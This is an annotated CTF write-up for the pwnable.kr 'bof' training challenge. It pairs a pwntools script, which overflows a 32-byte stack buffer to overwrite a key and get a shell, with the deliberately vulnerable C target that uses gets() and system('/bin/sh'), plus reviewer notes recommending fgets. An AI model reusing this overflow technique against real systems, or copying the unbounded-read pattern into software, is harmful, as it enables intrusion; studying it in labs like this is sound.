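# --- Listing 1: pwntools client from the write-up (Python) ---
# Connects to the public pwnable.kr training service, sends one oversized
# line to the program shown in Listing 2, then hands the session to the
# terminal.
from pwn import *

p = remote("pwnable.kr", 9000)

# Payload layout: 0x2c + 0x8 = 52 filler bytes, followed by the 32-bit value
# (packed by p32) that func() compares `key` against. The destination buffer
# is only 32 bytes, so everything after byte 32 lands in neighbouring stack
# memory.
# NOTE(review): the 0x2c / 0x8 split is the author's measurement of the
# compiled binary's stack frame; it cannot be derived from the C source
# alone and depends on compiler and flags.
pay = b'A' * (0x2c + 0x8) + p32(0xcafebabe)
p.sendline(pay)
p.interactive()


/* --- Listing 2: the target program (C) ---
 * NOTE(review): the three #include targets were lost when the page was
 * extracted. <stdio.h> and <stdlib.h> are what the visible calls (printf,
 * gets, system) require; <string.h> is presumed for the third -- confirm
 * against the original challenge source.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Prompt for a line of input and start a shell only if `key` equals
 * 0xcafebabe; otherwise print "Nah..".
 *
 * The only caller in this listing passes 0xdeadbeef, so the shell branch is
 * reachable solely through memory corruption: gets() takes no length limit
 * and keeps writing past the 32-byte buffer.
 *
 * Defensive notes:
 *  - gets() cannot be called safely and was removed from the language in
 *    C11. The bounded form is fgets(overflowme, sizeof overflowme, stdin).
 *  - `key` is tested before func() returns, so a mitigation that is only
 *    verified in the function epilogue (a stack protector canary) would not
 *    by itself stop this path. The bounded read is the actual fix.
 */
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!  (unbounded write into a 32-byte buffer)
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}

/* Entry point: calls func() with a constant that never matches the check. */
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

// bof: partial R..
// NOTE(review): the line above is cut off in the source; it may be the start
// of a binary-hardening summary for the challenge binary -- unconfirmed.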